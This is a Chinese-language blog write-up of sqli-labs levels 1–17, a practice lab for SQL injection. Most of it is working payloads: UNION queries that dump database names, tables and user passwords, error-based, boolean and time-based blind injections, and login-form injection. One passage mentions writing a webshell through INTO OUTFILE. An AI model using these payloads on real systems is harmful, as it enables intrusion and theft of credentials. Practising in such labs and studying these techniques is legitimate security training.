<!DOCTYPE html>
<html  lang="en" >
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, minimum-scale=1, initial-scale=1, maximum-scale=5, viewport-fit=cover">
    <title>Sqli-labs通关 | h00ls</title>
    <meta name="description" content="sqli-labs通关Basic Challenges(1-18关)">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-labs通关">
<meta property="og:url" content="http://example.com/2019/12/10/sqli-labs/index.html">
<meta property="og:site_name" content="h00ls">
<meta property="og:description" content="sqli-labs通关Basic Challenges(1-18关)">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/1574949017025.png">
<meta property="og:image" content="http://example.com/images/1574950705940.png">
<meta property="og:image" content="http://example.com/images/1574950834260.png">
<meta property="og:image" content="http://example.com/images/1574950925282.png">
<meta property="og:image" content="http://example.com/images/1574950983819.png">
<meta property="og:image" content="http://example.com/images/1574951027685.png">
<meta property="og:image" content="http://example.com/images/xm8zso5g.bmp">
<meta property="og:image" content="http://example.com/images/1574952192338.png">
<meta property="og:image" content="http://example.com/images/1574952393996.png">
<meta property="og:image" content="http://example.com/images/1575030156779.png">
<meta property="og:image" content="http://example.com/images/1575030284425.png">
<meta property="og:image" content="http://example.com/images/1575035354533.png">
<meta property="og:image" content="http://example.com/images/1575281363886.png">
<meta property="og:image" content="http://example.com/images/1575282576022.png">
<meta property="og:image" content="http://example.com/images/1575282621253.png">
<meta property="og:image" content="http://example.com/images/1575282685798.png">
<meta property="og:image" content="http://example.com/images/1575283197886.png">
<meta property="og:image" content="http://example.com/images/1575285329144.png">
<meta property="og:image" content="http://example.com/images/1575285367051.png">
<meta property="og:image" content="http://example.com/images/1575284897360.png">
<meta property="og:image" content="http://example.com/images/1575284927547.png">
<meta property="og:image" content="http://example.com/images/1575285504613.png">
<meta property="og:image" content="http://example.com/images/1575285541418.png">
<meta property="og:image" content="http://example.com/images/1575286265096.png">
<meta property="og:image" content="http://example.com/images/1575286400792.png">
<meta property="og:image" content="http://example.com/images/1575286518365.png">
<meta property="og:image" content="http://example.com/images/1575982545159.png">
<meta property="og:image" content="http://example.com/images/1575982647934.png">
<meta property="og:image" content="http://example.com/images/1575982769901.png">
<meta property="article:published_time" content="2019-12-10T14:23:07.000Z">
<meta property="article:modified_time" content="2021-02-04T03:25:52.321Z">
<meta property="article:author" content="h00ls">
<meta property="article:tag" content="靶机训练">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/1574949017025.png">

    <link rel="alternate" type="application/atom+xml" href="/atom.xml">
    <link rel="icon" href="/images/favicon.png" type="image/x-icon">

    
<link rel="stylesheet" href="/css/common.min.css">



    
    
    
    
        <link href="//cdn.jsdelivr.net/npm/lightgallery.js@1.1.3/dist/css/lightgallery.min.css" rel="stylesheet">
    
    
    
<link rel="stylesheet" href="/css/iconfont.min.css">

    
<meta name="generator" content="Hexo 5.3.0"></head>

    <body>
        <header class="header header-fixture">
    <div class="profile-search-wrap flex sm:block">
        
        
        <div class="profile sm:text-center md:px-1 lg:px-3 sm:pb-4 sm:pt-6">
            <a id="avatar" role="link" href="https://github.com/h00ls" class="inline-block lg:w-16 lg:h-16 w-8 h-8 m-2" target="_blank" rel="noopener" rel="noreferrer" >
                <img src="https://www.gravatar.com/avatar/0bc83cb571cd1c50ba6f3e8a78ef1346?s=128" class="rounded-full" alt="avatar">
            </a>
            <h2 id="name" class="hidden lg:block">h00ls</h2>
            <h3 id="title" class="hidden xl:block">安全那些事</h3>
            
            <small id="location" class="hidden lg:block">
                <i class="iconfont icon-map-icon"></i>
                Sichuan, China
            </small>
            
        </div>
        
        
<div class="search flex-1 flex lg:inline-block sm:hidden lg:px-4 lg:mt-2 lg:mb-4 lg:w-full">
    <form id="search-form" class="my-auto flex-1 lg:border lg:border-solid lg:border-gray-200">
        <div class="input-group table bg-gray-100 lg:bg-white w-full">
            <input id="search-input" type="text" placeholder="Search" class="inline-block w-full bg-gray-100 lg:bg-white">
            <span class="table-cell">
                <button name="search tigger button" disabled>
                    <i class="iconfont icon-search m-2"></i>
                </button>
            </span>
        </div>
    </form>
        
<script id="search-teamplate" type="text/html" data-path="/content.json">
    <div>
        <div class="search-header bg-gray-400">
            <input id="actual-search-input" model="keyword" ref="input" class="inline-block w-full h-10 px-2 py-1" placeholder="Search" type="text">
        </div>
        <div class="search-result bg-gray-200">
            {{#each searchPosts}}
            <a href="/{{ path }}" class="result-item block px-2 pb-3 mb-1 pt-1 hover:bg-indigo-100">
                <i class="iconfont icon-file"></i>
                <h1 class="result-title inline font-medium text-lg">{{ title }}</h1>
                <p class="result-content text-gray-600 text-sm">{{{ text }}}</p>
            </a>
            {{/each}}
        </div>
    </div>
</script>

</div>


        <button name="menu toogle button" id="menu-toggle-btn" class="block sm:hidden p-3" role="button" aria-expanded="false">
            <i class="iconfont icon-hamburger"></i>
        </button>
    </div>
    <nav id="menu-nav" class="hidden sm:flex flex-col">
        
        
            <div class="menu-item menu-home" role="menuitem">
                <a href="/.">
                    <i class="iconfont icon-home" aria-hidden="true"></i>
                    <span class="menu-title">Home</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-archives" role="menuitem">
                <a href="/archives">
                    <i class="iconfont icon-archive" aria-hidden="true"></i>
                    <span class="menu-title">Archives</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-categories" role="menuitem">
                <a href="/categories">
                    <i class="iconfont icon-folder" aria-hidden="true"></i>
                    <span class="menu-title">Categories</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-tags" role="menuitem">
                <a href="/tags">
                    <i class="iconfont icon-tag" aria-hidden="true"></i>
                    <span class="menu-title">Tags</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-repository" role="menuitem">
                <a href="/repository">
                    <i class="iconfont icon-project" aria-hidden="true"></i>
                    <span class="menu-title">Repository</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-links" role="menuitem">
                <a href="/links">
                    <i class="iconfont icon-friend" aria-hidden="true"></i>
                    <span class="menu-title">Links</span>
                </a>
            </div>
        
        
            <div class="menu-item menu-about" role="menuitem">
                <a href="/about">
                    <i class="iconfont icon-cup" aria-hidden="true"></i>
                    <span class="menu-title">About</span>
                </a>
            </div>
        
        
<div class="social-links flex sm:flex-col lg:hidden mt-5">
    
        <span class="social-item text-center">
            <a target="_blank" rel="noopener" href="https://github.com/h00ls">
                <i class="iconfont social-icon icon-github"></i>
                <span class="menu-title hidden lg:inline">menu.github</span>
            </a>
        </span>
    
        <span class="social-item text-center">
            <a href="/atom.xml">
                <i class="iconfont social-icon icon-rss"></i>
                <span class="menu-title hidden lg:inline">menu.rss</span>
            </a>
        </span>
    
</div>


    </nav>
</header>

        <section class="main-section">
            
    <main class="flex-1 px-4 py-12 md:px-5 lg:px-8 lg:py-4 relative min-h-screen">
    

    <article class="content article article-archives article-type-list" itemscope="">
        <header class="article-header">
            
    
        <h1 class="article-title text-lg" itemprop="name">
            Sqli-labs通关
        </h1>
    



            <p class="article-meta mb-3 text-xs">
                <span class="article-date">
    <i class="iconfont icon-calendar-check"></i>
	<a href="/2019/12/10/sqli-labs/" class="article-date">
	  <time datetime="2019-12-10T14:23:07.000Z" itemprop="datePublished">Dec 10</time>
	</a>
</span>

                
    <span class="article-category">
    <i class="iconfont icon-folder"></i>
    <a class="article-category-link" href="/categories/sql%E6%B3%A8%E5%85%A5%E7%BB%83%E4%B9%A0/">sql注入练习</a>
  </span>


                
    <span class="article-tags">
    <i class="iconfont icon-tag"></i>
    <a class="article-tag-none-link" href="/tags/%E9%9D%B6%E6%9C%BA%E8%AE%AD%E7%BB%83/" rel="tag">靶机训练</a>
  </span>


                <span class="_partial/post-comment"><i class="icon icon-comment"></i>
                    <a href="/2019/12/10/sqli-labs/#comments" class="article-comment-link">
                        Comments
                    </a>
                </span>
                
    
        <span class="post-wordcount" itemprop="wordCount">Word Count: 2.1k(words)</span>
    
    
        <span class="post-readcount" itemprop="timeRequired">Read Count: 8(minutes)</span>
    


            </p>
        </header>
        <div class="marked-body article-body">
            <h1 id="sqli-labs通关"><a href="#sqli-labs通关" class="headerlink" title="sqli-labs通关"></a>sqli-labs通关</h1><h2 id="Basic-Challenges-1-18关"><a href="#Basic-Challenges-1-18关" class="headerlink" title="Basic Challenges(1-18关)"></a>Basic Challenges(1-18关)</h2><a id="more"></a>

<h4 id="第一关：单引号报错注入"><a href="#第一关：单引号报错注入" class="headerlink" title="第一关：单引号报错注入"></a>第一关：单引号报错注入</h4><p>那就加一个单引号看看情况嘛</p>
<p><code>http://localhost/sqli-labs/Less-1/?id=1&#39;</code></p>
<p><img src="/images/1574949017025.png" alt="1574949017025"></p>
<p>那么流程直接往下走，没有任何过滤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># 获取数据库名</span><br><span class="line">-1&#39; union select 1,2,group_concat(schema_name) from information_schema.schemata -- +</span><br><span class="line"></span><br><span class="line"># 获取表名</span><br><span class="line">-1&#39;  union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;&#39;security&#39; -- +</span><br><span class="line"></span><br><span class="line"># 获取列名</span><br><span class="line">-1&#39;  union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39; -- +</span><br><span class="line"></span><br><span class="line"># 获取数据</span><br><span class="line">-1&#39;  union select 1,2,group_concat(&quot;&#x2F;&quot;, username,&quot; : &quot;, password) from users -- +</span><br></pre></td></tr></table></figure>
<p><img src="/images/1574950705940.png" alt="1574950705940"></p>
<p>经验</p>
<ul>
<li><p>我发现在<code>-- +</code> 后面的+可以换成任何符号，都能实现注释。例如：<code>-- 0o0</code></p>
<p><img src="/images/1574950834260.png" alt="1574950834260"></p>
<p>但是，如果不加任何字符就会报错，如：</p>
<p><img src="/images/1574950925282.png" alt="1574950925282"></p>
</li>
<li><p>还有这里直接使用 <code>#</code> 不能实现注入，然后看了下后端代码没有任何处理，理论上不应该</p>
<p><img src="/images/1574950983819.png" alt="1574950983819"></p>
<p>为什么非要编码成 <code>%23</code></p>
<p><img src="/images/1574951027685.png" alt="1574951027685"></p>
<p>这里的原因也困扰了我好久，借用别人已经探究过的博客：<a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-219378.htm">传送门</a></p>
<p><img src="/images/xm8zso5g.bmp" alt="xm8zso5g"></p>
</li>
</ul>
<h4 id="第二关：整形注入"><a href="#第二关：整形注入" class="headerlink" title="第二关：整形注入"></a>第二关：整形注入</h4><p>把所有注入语句中的 <code>id=1&#39;</code> 变成 <code>id=1</code> 后面其他字符串不变。即可</p>
<h4 id="第三关：单引号-括号"><a href="#第三关：单引号-括号" class="headerlink" title="第三关：单引号+括号"></a>第三关：单引号+括号</h4><p>尝试一下：<code>http://localhost/sqli-labs/Less-3/?id=1&#39;</code></p>
<p><img src="/images/1574952192338.png" alt="1574952192338"></p>
<p>那就闭合一下括号</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;-1&#39;) union select 1,2,group_concat(schema_name) from information_schema.schemata -- +</span><br></pre></td></tr></table></figure>
<p>步骤和上面一样</p>
<h4 id="第四关：双引号-括号"><a href="#第四关：双引号-括号" class="headerlink" title="第四关：双引号+括号"></a>第四关：双引号+括号</h4><p>访问：<code>http://localhost/sqli-labs/Less-4/?id=1&quot;</code></p>
<p><img src="/images/1574952393996.png" alt="1574952393996"></p>
<p>通过引号配对，看出多了个双引号和括号。直接构造payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id&#x3D;1&quot;) --+</span><br></pre></td></tr></table></figure>
<p>注入同上。</p>
<h4 id="第五关：报错注入-单引号"><a href="#第五关：报错注入-单引号" class="headerlink" title="第五关：报错注入(单引号)"></a>第五关：报错注入(单引号)</h4><p>访问网站：<code>http://localhost/sqli-labs/Less-5/?id=2&#39;</code></p>
<p>单引号报错</p>
<p><img src="/images/1575030156779.png" alt="1575030156779"></p>
<p>使用payload，并不会回显：<code>http://localhost/sqli-labs/Less-5/?id=2&#39; union select 1,2,3 -- +</code></p>
<p><img src="/images/1575030284425.png" alt="1575030284425"></p>
<p>但是它可以显示错误的sql语句信息，这时候就可以采用报错回显的方式进行注入。</p>
<p>报错注入方式：</p>
<ul>
<li><p>floor报错注入</p>
<p>替换其中的payload即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)  </span><br><span class="line"></span><br><span class="line">如下,猜测数据库</span><br><span class="line">?id&#x3D;2&#39; and (select 1 from (select count(*),concat((select concat(schema_name) from information_schema.schemata limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- +</span><br><span class="line"></span><br><span class="line">猜表名</span><br><span class="line">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs&#x2F;Less-5&#x2F;?id&#x3D;2&#39; and (select 1 from (select count(*),concat((select concat(table_name) from information_schema.tables where table_schema&#x3D;&#39;security&#39; limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- +</span><br><span class="line"></span><br><span class="line">看着来吧，不写了。</span><br></pre></td></tr></table></figure></li>
<li><p>extractvalue 报错注入(能查询字符串的最大长度为32)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;2&#39; and extractvalue(1, concat(0x5c, (payload))) -- +</span><br><span class="line"># payload 部分和上面完全一样</span><br></pre></td></tr></table></figure></li>
<li><p>updatexml (能查询字符串的最大长度为32)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;2&#39; and 1&#x3D;(updatexml(1,concat(0x3a,(payload)),1)) -- +</span><br></pre></td></tr></table></figure></li>
<li><p>其他各种<strong>报错注入</strong>方式：<code>https://www.jianshu.com/p/bc35f8dd4f7c</code></p>
</li>
<li><p>这道题还可以用盲注</p>
</li>
</ul>
<h4 id="第六关：报错注入-双引号"><a href="#第六关：报错注入-双引号" class="headerlink" title="第六关：报错注入(双引号)"></a>第六关：报错注入(双引号)</h4><p>和上面类似，就只是把 <code>id=2&#39;</code> 改成 <code>id=2&quot;</code></p>
<h4 id="第七关：outfile方式读取"><a href="#第七关：outfile方式读取" class="headerlink" title="第七关：outfile方式读取"></a>第七关：outfile方式读取</h4><p>这个有点神奇哦，先要尝试各种报错，看看要不要闭合引号、括号之类的。我们输入下面这个payload，它不报错。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs&#x2F;Less-7&#x2F;?id&#x3D;2&quot; %23</span><br></pre></td></tr></table></figure>
<p><img src="/images/1575035354533.png" alt="1575035354533"></p>
<p>我的猜测是，他将 <code>&quot;#</code> 当成单引号里面的内容了，也就是在没遇到下一个单引号之前，所有的输入都会当成单引号里面的内容。看源码是这样的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs&#x2F;Less-7&#x2F;?id&#x3D;2&quot; %23</span><br></pre></td></tr></table></figure>
<p>然后就闭合呗，因为这里不能使用回显注入，报错也不回显了。那就只能用盲注了。</p>
<p>一般上传webshell可以用这种方法，但是用这种方法来实现注入有点大材小用的感觉。满足条件：</p>
<ul>
<li>知道网站绝对路径</li>
<li>开启security_priv_file</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>
<p>访问文件即可。<strong>注意上面每次导出的时候，名字不能重复，会导致失败</strong></p>
<p><img src="/images/1575281363886.png" alt="1575281363886"></p>
<h4 id="第八关：布尔型注入"><a href="#第八关：布尔型注入" class="headerlink" title="第八关：布尔型注入"></a>第八关：布尔型注入</h4><p>没有回显，用 <code>id=1&#39; and 1=1 -- +</code> 和 <code>id=1&#39; and 1=0 -- +</code> 判断怎么闭合。如果前一个有显示，后一个没显示，那么就可以猜测后端需要通过闭合单引号实现注入。</p>
<p>接下来需要猜测数据库名字，这时候没有显示只能一个一个字母来进行猜测了。下面说下原理就行了，挨个挨个才比较麻烦，直接上sqlmap</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 第一个数据库的第一个字母 是否大于 a</span><br><span class="line">?id&#x3D;1&#39; and substr((select schema_name from information_schema.schemata limit 0,1),1,1) &gt; &#39;a&#39; -- +</span><br></pre></td></tr></table></figure>
<p><img src="/images/1575282576022.png" alt="1575282576022"></p>
<p>说明大于a</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 第一个数据库的第二个字母 是否大于 s</span><br><span class="line">?id&#x3D;1&#39; and substr((select schema_name from information_schema.schemata limit 0,1),1,1) &gt; &#39;s&#39; -- +</span><br></pre></td></tr></table></figure>
<p><img src="/images/1575282621253.png" alt="1575282621253"></p>
<p>说明小于a</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">是否等于 i</span><br><span class="line">?id&#x3D;1&#39; and substr((select schema_name from information_schema.schemata limit 0,1),1,1) &#x3D; &#39;i&#39; -- +</span><br></pre></td></tr></table></figure>
<p><img src="/images/1575282685798.png" alt="1575282685798"></p>
<p>说明第一个数据库的第一个字母是 i </p>
<p>然后不断调整substr函数截取的字母，就能猜出第一个数据的全名，然后移动 limit 后的数字继续猜测第二数据库名字。不多说了。</p>
<h4 id="第九关：单引号-时间盲注"><a href="#第九关：单引号-时间盲注" class="headerlink" title="第九关：单引号+时间盲注"></a>第九关：单引号+时间盲注</h4><p>一直不太清楚基于时间盲注和布尔型注入的区别，做了一遍题，才深有体会。同样需要看看怎么闭合引号、括号。你会发现在这里，不管你怎么输入，都不会有异常显示出来。这时候就考虑下延时注入。</p>
<p>使用下面的payload，会延时10s，说明是闭合单引号的时间盲注</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs&#x2F;Less-9&#x2F;?id&#x3D;2&#39; and sleep(10) -- +</span><br></pre></td></tr></table></figure>
<p><img src="/images/1575283197886.png" alt="1575283197886"></p>
<p>这时候就可以构造payload了，步骤和上面基本类似，挨个挨个字母判断：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;2&#39; and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)&#x3D;&#39;i&#39;, sleep(10), 1) -- +</span><br></pre></td></tr></table></figure>
<p>对照着上面来。不写了。</p>
<h4 id="第十关：双引号-时间盲注"><a href="#第十关：双引号-时间盲注" class="headerlink" title="第十关：双引号+时间盲注"></a>第十关：双引号+时间盲注</h4><p>把 <code>?id=2&#39; </code> 换成 <code>?id=2&quot; </code> 其他的都不变。参考第九关</p>
<h4 id="第十一关：POST注入"><a href="#第十一关：POST注入" class="headerlink" title="第十一关：POST注入"></a>第十一关：POST注入</h4><blockquote>
<p>输入用户名：name          密码：pass’ #</p>
<p>输入用户名：name’ #      密码：pass</p>
</blockquote>
<p>均没有报错，猜测用户名和密码都可是注入。然后就开始各种尝试了</p>
<p><strong>用户名处注入</strong></p>
<p>用户名输入一个数据库中不存在的，因为报错了才能回显，如我这里输入用户名：<code>/&#39; union select version(),2 #</code>，输入密码：123456</p>
<p><img src="/images/1575285329144.png" alt="1575285329144"></p>
<p>看到数据库版本：</p>
<p><img src="/images/1575285367051.png" alt="1575285367051"></p>
<p><strong>密码处注入</strong></p>
<p>用户名随便输，密码写成：<code>pass&#39; union select version(),2 #</code></p>
<p><img src="/images/1575284897360.png" alt="1575284897360"></p>
<p>就能看到version了</p>
<p><img src="/images/1575284927547.png" alt="1575284927547"></p>
<p>剩下的就和回显注入一模一样了。不多说了</p>
<h4 id="第十二关：双引号-括号-回显注入"><a href="#第十二关：双引号-括号-回显注入" class="headerlink" title="第十二关：双引号+括号+回显注入"></a>第十二关：双引号+括号+回显注入</h4><blockquote>
<p>用户名：admin</p>
<p>密码：123”) union select version(),2 #</p>
</blockquote>
<p><img src="/images/1575285504613.png" alt="1575285504613"></p>
<p>得到返回结果：</p>
<p><img src="/images/1575285541418.png" alt="1575285541418"></p>
<p>和上面重复率太高，不写了。</p>
<h4 id="第十三关：单引号-括号-报错型注入"><a href="#第十三关：单引号-括号-报错型注入" class="headerlink" title="第十三关：单引号+括号+报错型注入"></a>第十三关：单引号+括号+报错型注入</h4><blockquote>
<p>用户名：admin’) and (select 1 from (select count(*),concat((select concat(schema_name) from information_schema.schemata limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #</p>
<p>密码：随便写</p>
</blockquote>
<p><img src="/images/1575286265096.png" alt="1575286265096"></p>
<h4 id="第十四关：双引号-报错注入"><a href="#第十四关：双引号-报错注入" class="headerlink" title="第十四关：双引号+报错注入"></a>第十四关：双引号+报错注入</h4><blockquote>
<p>输入用户名：admin’) and 1=1 #</p>
<p>输入密码：123</p>
</blockquote>
<p>报错信息如下：</p>
<p><img src="/images/1575286400792.png" alt="1575286400792"></p>
<p>构造payload</p>
<blockquote>
<p>用户名：admin’) and (select 1 from (select count(*),concat((select concat(schema_name) from information_schema.schemata limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #</p>
<p>密码：随便写</p>
</blockquote>
<p><img src="/images/1575286518365.png" alt="1575286518365"></p>
<p>不搞了。</p>
<h4 id="第十五关：单引号-布尔型盲注"><a href="#第十五关：单引号-布尔型盲注" class="headerlink" title="第十五关：单引号+布尔型盲注"></a>第十五关：单引号+布尔型盲注</h4><blockquote>
<p>用户名：admin’ and substr((select schema_name from information_schema.schemata limit 0,1),1,1) &gt; ‘a’</p>
<p>密   码：随便写</p>
</blockquote>
<p>通过是否登录成功判断每个字母的正确性。参考第八关</p>
<h4 id="第十六关：双引号-布尔型注入"><a href="#第十六关：双引号-布尔型注入" class="headerlink" title="第十六关：双引号+布尔型注入"></a>第十六关：双引号+布尔型注入</h4><blockquote>
<p>用户名：admin“ and substr((select schema_name from information_schema.schemata limit 0,1),1,1) &gt; ‘a’</p>
<p>密   码：随便写</p>
</blockquote>
<p>通过是否登录成功判断每个字母的正确性。参考第八关</p>
<h4 id="第十七关：单引号-报错注入"><a href="#第十七关：单引号-报错注入" class="headerlink" title="第十七关：单引号+报错注入"></a>第十七关：单引号+报错注入</h4><blockquote>
<p>用户名：admin</p>
<p>密   码：123’ and extractvalue(1,concat(0x7e,(payload),0x7e))#</p>
</blockquote>
<p>一直尝试时间注入，回车后网页一直加载不出来。</p>
<p><img src="/images/1575982545159.png" alt="1575982545159"></p>
<p>看下源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$update&#x3D;&quot;UPDATE users SET password &#x3D; &#39;$passwd&#39; WHERE username&#x3D;&#39;$row1&#39;&quot;;</span><br></pre></td></tr></table></figure>
<p>然后在mysql命令行中尝试了下</p>
<p><img src="/images/1575982647934.png" alt="1575982647934"></p>
<p>最后发现要想使用时间注入，你要把后面哪个用户名给加上才行。也就是：</p>
<blockquote>
<p>用户名：admin</p>
<p>密   码：123’ where username=’admin’ and sleep(10) #</p>
</blockquote>
<p><img src="/images/1575982769901.png" alt="1575982769901"></p>
<p>郁闷一分钟。</p>

        </div>
        
<blockquote class="copyright">
    <p><strong>Link to this article : </strong><a class="permalink" href="http://example.com/2019/12/10/sqli-labs/">http://example.com/2019/12/10/sqli-labs/</a></p>
    <p><strong>This article is available under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener noreferrer">Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)</a> License</strong></p>
</blockquote>


    </article>
    
    <section id="comments">
        
    </section>


    

</main>


<aside style="" id="sidebar" class="aside aside-fixture">
    <div class="toc-sidebar">
        <nav id="toc" class="article-toc">
            <h3 class="toc-title">Catalogue</h3>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#sqli-labs%E9%80%9A%E5%85%B3"><span class="toc-number">1.</span> <span class="toc-text">sqli-labs通关</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Basic-Challenges-1-18%E5%85%B3"><span class="toc-number">1.1.</span> <span class="toc-text">Basic Challenges(1-18关)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E5%85%B3%EF%BC%9A%E5%8D%95%E5%BC%95%E5%8F%B7%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.1.</span> <span class="toc-text">第一关：单引号报错注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E5%85%B3%EF%BC%9A%E6%95%B4%E5%BD%A2%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.2.</span> <span class="toc-text">第二关：整形注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E5%85%B3%EF%BC%9A%E5%8D%95%E5%BC%95%E5%8F%B7-%E6%8B%AC%E5%8F%B7"><span class="toc-number">1.1.0.3.</span> <span class="toc-text">第三关：单引号+括号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E5%85%B3%EF%BC%9A%E5%8F%8C%E5%BC%95%E5%8F%B7-%E6%8B%AC%E5%8F%B7"><span class="toc-number">1.1.0.4.</span> <span class="toc-text">第四关：双引号+括号</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%BA%94%E5%85%B3%EF%BC%9A%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5-%E5%8D%95%E5%BC%95%E5%8F%B7"><span class="toc-number">1.1.0.5.</span> <span class="toc-text">第五关：报错注入(单引号)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%85%AD%E5%85%B3%EF%BC%9A%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5-%E5%8F%8C%E5%BC%95%E5%8F%B7"><span class="toc-number">1.1.0.6.</span> <span class="toc-text">第六关：报错注入(双引号)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%B8%83%E5%85%B3%EF%BC%9Aoutfile%E6%96%B9%E5%BC%8F%E8%AF%BB%E5%8F%96"><span class="toc-number">1.1.0.7.</span> <span class="toc-text">第七关：outfile方式读取</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%85%AB%E5%85%B3%EF%BC%9A%E5%B8%83%E5%B0%94%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.8.</span> <span class="toc-text">第八关：布尔型注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E4%B9%9D%E5%85%B3%EF%BC%9A%E5%8D%95%E5%BC%95%E5%8F%B7-%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">1.1.0.9.</span> <span class="toc-text">第九关：单引号+时间盲注</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E5%85%B3%EF%BC%9A%E5%8F%8C%E5%BC%95%E5%8F%B7-%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">1.1.0.10.</span> <span class="toc-text">第十关：双引号+时间盲注</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%B8%80%E5%85%B3%EF%BC%9APOST%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.11.</span> <span class="toc-text">第十一关：POST注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%85%B3%EF%BC%9A%E5%8F%8C%E5%BC%95%E5%8F%B7-%E6%8B%AC%E5%8F%B7-%E5%9B%9E%E6%98%BE%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.12.</span> <span class="toc-text">第十二关：双引号+括号+回显注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%B8%89%E5%85%B3%EF%BC%9A%E5%8D%95%E5%BC%95%E5%8F%B7-%E6%8B%AC%E5%8F%B7-%E6%8A%A5%E9%94%99%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.0.13.</span> <span class="toc-text">第十三关：单引号+括号+报错型注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" 